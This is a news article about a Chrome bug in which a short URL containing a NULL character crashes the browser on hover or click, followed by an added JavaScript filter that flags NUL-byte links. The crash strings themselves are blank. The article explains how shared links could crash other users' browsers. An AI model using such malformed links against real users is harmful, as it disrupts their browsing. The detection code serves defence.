This 16-Character Link Crashes Google's Chrome Browser

This is not Google’s finest hour: Following on the heels of news that hacking Android Lollipop is as easy as typing a long string of characters comes word that a string of 16 characters can crash Google’s Chrome web browser — and you don’t even have to type it into the address bar.

The bug was exposed by Latvia-based software engineer and security researcher Andris Atteka, who shared his discovery in a blog post. In his example, he used a 26-character string to crash Chrome. However, VentureBeat used this 16-character string, which also crashes the browser: 


To trigger the crash, any one of the following is enough:
  1. Type a 16-character link and hit enter
  2. Click on a 16-character link
  3. Just put your cursor on a 16-character link

Yes, that's right. You don't even have to open or click the malformed link to cause the crash; putting the cursor on the link is enough to crash Chrome.

All the tricks mentioned above will either kill that particular Chrome tab or kill the whole Chrome browser.

The issue was discovered by security researcher Andris Atteka, who explained in his blog post that just adding a NULL char to the URL string could crash Chrome instantly.

Atteka was able to crash the browser with a 26-character string, which is given below:

WARNING: Don't click or even point your cursor at the following link; otherwise it will crash your tab or even your whole Chrome browser.


However, VentureBeat managed to crash the browser with even fewer characters, only 16 in total (given below).


Here's the technical explanation given by Atteka:
"It seems to be crashing in some very old code. In the Debug build, it is hitting a DCHECK on an invalid URL in GURL, deep in some History code. Given that it is hitting a CHECK in the Release build, I do not think this is actually a security bug, but I am going to leave it as such."
The issue appears small but is actually serious: any of your friends could tweet the link in question and crash Chrome for every user whose Twitter timeline loads that link.
Your friends could even send this link in emails or messages just to bother you.
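
A defensive check for the condition described above, as an added example that is not from the article, from Atteka, or from Chrome's code: before a site or mail gateway turns user-submitted text into clickable links, it can flag any URL that carries a NUL byte, whether raw or hidden under layers of percent-encoding. The function names, the decode-round limit and the sample URLs are assumptions constructed for illustration.

```javascript
// Added example: flag links that carry a NUL byte, raw or percent-encoded.
const MAX_DECODE_ROUNDS = 3; // assumption: anything nested deeper is quarantined

// Tolerant single-pass percent-decoder. decodeURIComponent() throws on
// malformed sequences, so a hand-rolled byte-wise decoder is used instead.
function decodeOnce(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Returns how many decode rounds it takes for a NUL to appear (0 = raw NUL),
// -1 if the URL decodes fully without one, or MAX_DECODE_ROUNDS + 1 if it is
// still changing after the limit (treated as suspicious by the caller).
function nulDepth(url) {
  let current = url;
  for (let round = 0; round <= MAX_DECODE_ROUNDS; round++) {
    if (current.includes("\u0000")) return round;
    const next = decodeOnce(current);
    if (next === current) return -1; // fixed point: nothing left to unwrap
    current = next;
  }
  return MAX_DECODE_ROUNDS + 1;
}

// Scan untrusted text (a message, a post) and split its links into those
// safe to render as anchors and those to show only as inert text.
function triageLinks(text) {
  const links = text.match(/https?:\/\/[^\s<>"']+/g) || [];
  const result = { render: [], quarantine: [] };
  for (const link of links) {
    const depth = nulDepth(link);
    if (depth === -1) result.render.push(link);
    else result.quarantine.push({ link, depth });
  }
  return result;
}

// Constructed sample input; these are not the strings from the article.
const sample = [
  "see https://example.test/docs?page=2",
  "and http://example.test/a%00b",
  "and http://example.test/a%2500b",
  "and https://example.test/100%25-legit",
].join(" ");

console.log(JSON.stringify(triageLinks(sample), null, 2));
```

Quarantined links should be displayed as plain text rather than anchors, so neither a click nor a hover hands them to the browser's URL handling.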

